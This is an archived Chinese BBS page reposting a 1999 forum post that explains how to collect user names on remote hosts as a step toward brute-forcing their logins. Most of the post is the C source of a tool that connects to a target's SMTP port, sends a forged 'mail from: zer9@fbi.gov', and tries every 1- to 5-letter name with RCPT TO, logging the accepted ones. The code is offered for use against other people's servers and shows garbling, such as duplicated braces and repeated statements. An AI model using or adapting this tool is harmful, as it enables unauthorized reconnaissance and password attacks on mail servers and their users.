243.htm

unix高级编程原吗

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="190.htm">上一层</a>][<a href="244.htm">下一篇</a>]
<hr><p align="left"><small>------------------------------------------------------------------------ <br>
---- <br>
 小眼睛 于 99-9-29 15:25:06 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统安 <br>
全： <br>
  <br>
                如何获的远程主机上的用户列表 <br>
:作者：zer9 (zer9),时间：1999年05月01日) <br>
  <br>
cgi ,anonymous ftp,remote overflow... <br>
当用尽了你所知道的技巧也不能进入站点时， <br>
这时你只有两个选择：1。放弃 2。使用早以被你遗弃 <br>
的暴力法，强行突破。:)(I'd like this 0ne:)但为了 <br>
捍卫hacker的荣誉,当然是不能就此罢休的:) <br>
如果让你从 telnet+/etc/passwd 或一个（或几个）用户名 <br>
+pop3hack你会选那一样？我选前者。试试就知道了. <br>
  <br>
:确定远程主机上的用户名有如下几种方法： <br>
1.通过如finger,ruser之类的服务。 <br>
  (如 isp) <br>
2.通过漏洞直接得到/etc/passwd,or the CORE include passwd <br>
  (如sunos) <br>
3.通过报纸，杂志慢慢的收集 :) <br>
  (如。。。 电脑报 :） <br>

:4.通过sMTp（25）. <br>
...(还有什么遗漏的请告诉我哟:) <br>
  <br>
一般情况下前两种都是ADM 重点防范的对象，除非是 <br>
那些烂站，第三种你有耐心也可一试； <br>
而第四种则是sMTp 本身固有的缺陷， <br>
再加上sMtp的重要性，几乎绝大多数的站点都没有关闭之。 <br>
这也就成了我们利用的对象。在sMtp 的命令中，有价值 <br>
的有如下几种： VRFY,EXPN,RCPT。都可以利用。 <br>
但我测试的结果RCPt最快。具体程序如下。 <br>
                                                               zer9@21 <br>
cn.com <br>
----Cut Here --------------------------------------------------------- <br>
------ <br>
/* 通过"rcpt" 获得远程主机上的用户列表->/etc/passwd <br>
*  thr0ugh "rcpt" gain rem0te server's user list <br>
*                       by <br>
*                      zer9 <br>
* <br>
*                  zer9@21cn.com <br>
* <br>
*          test on:slackware 2.0.34&irix6.4 <br>

*               cc rcpt.c -o rcpt <br>
*         后台运行：nohup ./rcpt <Target>& <br>
*/ <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <string.h> <br>
#include <netinet/in.h> <br>
#include <sys/types.h> <br>
#include <sys/stat.h> <br>
#include <sys/time.h> <br>
#include <fcntl.h> <br>
#include <netdb.h> <br>
#include <unistd.h> <br>
#include <sys/socket.h> <br>
#include <signal.h> <br>
#include <ctype.h> <br>
#include <arpa/inet.h> <br>
#define  SMTPPORT   25 <br>
#define  VERSION     "0.08" <br>
#define  LogFile    "./rcpt.log" <br>
#define  TIMEOUT    200 <br>
#define  SleepTime  1 <br>

int ver(void); <br>
int look_up(int sock,char *string,char *buff); <br>
int writeln(int sock,char *string) <br>
{ <br>
char sendbuf[100]; <br>
bzero(sendbuf,100); <br>
strncpy(sendbuf,string,strlen(string)); <br>
strncat(sendbuf,"\n",1); <br>
send(sock,sendbuf,strlen(sendbuf),0); <br>
return 0; <br>
} <br>
int s; <br>
FILE *fp; <br>
int main(int argc,char *argv[]) <br>
{ <br>
struct sockaddr_in sin; <br>
struct in_addr Target; <br>
struct hostent *he; <br>
char j; <br>
char recvbuf[1000],rcpt[200],a[8],hello_Target[500]; <br>
if(argc!=2) <br>
  { <br>
  { <br>
   printf("Rcpt %s   by zer9[FTT]  mailto: zer9@21cn.com\n",VERSION); <br>
   printf("Usage: %s <Target>\n",argv[0]); <br>
   return -1; <br>
  } <br>
if((fp=fopen(LogFile,"a+"))==NULL) <br>
{ <br>
  perror("fopen"); <br>
  return -1; <br>
} <br>
if((he=gethostbyname(argv[1]))!=NULL) <br>
{ <br>
  bcopy(he->h_addr,(char *)&Target.s_addr,he->h_length); <br>
} <br>
else <br>
  Target.s_addr=inet_addr(argv[1]); <br>
if(Target.s_addr==-1) <br>
  { <br>
   perror("gethostbyname"); <br>
   return -1; <br>
  } <br>
  ver(); <br>
  fprintf(fp,"@Target: %s   ",argv[1]); <br>

  if((s=socket(AF_INET,SOCK_STREAM,0))<0) <br>
  { <br>
   perror("sock"); <br>
   return -1; <br>
  } <br>
  sin.sin_family=AF_INET; <br>
  sin.sin_port=htons(SMTPPORT); <br>
  sin.sin_addr.s_addr=Target.s_addr; <br>
  if(connect(s,(struct sockaddr*)&sin,sizeof(sin))<0) <br>
  { <br>
   perror("connect"); <br>
   return -1; <br>
  } <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
bzero(rcpt,sizeof(rcpt)); <br>
bzero(a,sizeof(a)); <br>
fprintf(fp,"========================================================= <br>
======\n"); <br>
if(recv(s,recvbuf,sizeof(recvbuf),0)<0)       /* get Title */ <br>
  { <br>
   perror("recv"); <br>
   return -1; <br>
   return -1; <br>
  } <br>
fprintf(fp,"%s\n",recvbuf); <br>
writeln(s,"help"); <br>
recv(s,recvbuf,sizeof(recvbuf),0); <br>
fprintf(fp,"%s",recvbuf); <br>
if(strstr(recvbuf,"RCPT")==NULL)       /* check RCPT */ <br>
{ <br>
  perror("no RCPT command. exit..."); <br>
  return -1; <br>
} <br>
fprintf(fp,"------------------------------------\n"); <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
writeln(s,"RSET"); <br>
recv(s,recvbuf,sizeof(recvbuf),0); <br>
fprintf(fp,"%s",recvbuf); <br>
strcpy(hello_Target,"HELO "); <br>
strcat(hello_Target,"default"); <br>
writeln(s,hello_Target); <br>
recv(s,recvbuf,sizeof(recvbuf),0); <br>
fprintf(fp,"%s",recvbuf); <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
writeln(s,"mail from: zer9@fbi.gov");     /*ma1l fr0m: zer9@fbi.gov*/ <br>

recv(s,recvbuf,sizeof(recvbuf),0); <br>
fprintf(fp,"%s",recvbuf); <br>
fprintf(fp,"------------------------------------\n"); <br>
/* 1 bits */ <br>
for(a[0]='a';a[0]<='z';a[0]++) <br>
{ <br>
  bzero(recvbuf,sizeof(recvbuf)); <br>
  bzero(rcpt,sizeof(rcpt)); <br>
  strncpy(rcpt,"rcpt to: ",9); <br>
  sprintf(a,"%c",a[0]); <br>
  strncat(rcpt,a,strlen(a)); <br>
  alarm(TIMEOUT); <br>
  writeln(s,rcpt); <br>
  sleep(SleepTime); <br>
  recv(s,recvbuf,sizeof(recvbuf),0); <br>
  alarm(0); <br>
  look_up(s,rcpt,recvbuf); <br>
} <br>
/* 2 bits*/ <br>
for(a[0]='a';a[0]<='z';a[0]++) <br>
for(a[1]='a';a[1]<='z';a[1]++) <br>
{ <br>
{ <br>
  bzero(recvbuf,sizeof(recvbuf)); <br>
  bzero(rcpt,sizeof(rcpt)); <br>
  strncpy(rcpt,"rcpt to: ",9); <br>
  sprintf(a,"%c%c",a[0],a[1]); <br>
  strncat(rcpt,a,strlen(a)); <br>
  alarm(TIMEOUT); <br>
  writeln(s,rcpt); <br>
  sleep(SleepTime); <br>
  recv(s,recvbuf,sizeof(recvbuf),0); <br>
  alarm(0); <br>
  look_up(s,rcpt,recvbuf); <br>
} <br>
/* 3 bits */ <br>
for(a[0]='a';a[0]<='z';a[0]++) <br>
for(a[1]='a';a[1]<='z';a[1]++) <br>
  for(a[2]='a';a[2]<='z';a[2]++) <br>
  { <br>
   bzero(recvbuf,sizeof(recvbuf)); <br>
   bzero(rcpt,sizeof(rcpt)); <br>
   strncpy(rcpt,"rcpt to: ",9); <br>
   sprintf(a,"%c%c%c",a[0],a[1],a[2]); <br>
   strncat(rcpt,a,strlen(a)); <br>

   alarm(TIMEOUT); <br>
   writeln(s,rcpt); <br>
   sleep(SleepTime); <br>
   recv(s,recvbuf,sizeof(recvbuf),0); <br>
   alarm(0); <br>
   look_up(s,rcpt,recvbuf); <br>
  } <br>
/* 4 bits */ <br>
for(a[0]='a';a[0]<='z';a[0]++) <br>
for(a[1]='a';a[1]<='z';a[1]++) <br>
for(a[2]='a';a[2]<='z';a[2]++) <br>
  for(a[3]='a';a[3]<='z';a[3]++) <br>
  { <br>
   bzero(recvbuf,sizeof(recvbuf)); <br>
   bzero(rcpt,sizeof(rcpt)); <br>
   strncpy(rcpt,"rcpt to: ",9); <br>
   sprintf(a,"%c%c%c%c",a[0],a[1],a[2],a[3]); <br>
   strncat(rcpt,a,strlen(a)); <br>
   alarm(TIMEOUT); <br>
   writeln(s,rcpt); <br>
   sleep(SleepTime); <br>
   recv(s,recvbuf,sizeof(recvbuf),0); <br>

   alarm(0); <br>
   look_up(s,rcpt,recvbuf); <br>
  } <br>
/* 5 bits */ <br>
for(a[0]='a';a[0]<='z';a[0]++) <br>
for(a[1]='a';a[1]<='z';a[1]++) <br>
  for(a[2]='a';a[2]<='z';a[2]++) <br>
   for(a[3]='a';a[3]<='z';a[3]++) <br>
   for(a[4]='a';a[4]<='z';a[4]++) <br>
   { <br>
    bzero(recvbuf,sizeof(recvbuf)); <br>
    bzero(rcpt,sizeof(rcpt)); <br>
    strncpy(rcpt,"rcpt to: ",9); <br>
    sprintf(a,"%c%c%c%c%c",a[0],a[1],a[2],a[3],a[4]); <br>
    strncat(rcpt,a,strlen(a)); <br>
    alarm(TIMEOUT); <br>
    writeln(s,rcpt); <br>
    sleep(SleepTime); <br>
    recv(s,recvbuf,sizeof(recvbuf),0); <br>
    alarm(0); <br>
    look_up(s,rcpt,recvbuf); <br>
   } <br>
   } <br>
/*in=fdopen(s,"r"); <br>
writeln(s,"rcpt to: hacker"); <br>
writeln(s,"rcpt to: root"); <br>
writeln(s,"rcpt to: sun"); <br>
writeln(s,"rcpt to: zero"); <br>
writeln(s,"rcpt to: zer0"); <br>
writeln(s,"rcpt to: uucp"); <br>
writeln(s,"rcpt to: 12345"); <br>
writeln(s,"rcpt to: ftp"); <br>
writeln(s,"rcpt to: guest"); <br>
writeln(s,"rcpt to: oracle"); <br>
writeln(s,"rcpt to: 345"); <br>
writeln(s,"rcpt to: uucp"); <br>
writeln(s,"QUIT"); <br>
while(fgets(recvbuf,sizeof(recvbuf),in)!=NULL) <br>
{ <br>
  if(strstr(recvbuf,"ok")!=NULL) <br>
   printf("%s",recvbuf); <br>
  fflush(in); <br>
} <br>
fclose(in); */ <br>
fprintf(fp,"========================================================= <br>

====\n"); <br>
fprintf(fp,"okay!\n\n\n\n\n"); <br>
fclose(fp); <br>
close(s); <br>
return 0; <br>
} <br>
int look_up(int sock,char *string,char *buff) <br>
{ <br>
if(strstr(buff,"ent ok")!=NULL)        /* at sendmail 8.8.7: Recipien <br>
t ok*/ <br>
    fprintf(fp,"%s",buff); <br>
fflush(fp); <br>
return 0; <br>
} <br>
int ver(void) <br>
{ <br>
fprintf(fp,"\n###############################\n"); <br>
fprintf(fp,"Rcpt %s   by zer9[FTT]  mailto: zer9@21cn.com\n",VERSION) <br>
; <br>
return 0; <br>
} <br>
---------------------------------------------------------------------------- <br>

---- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="190.htm">上一层</a>][<a href="244.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>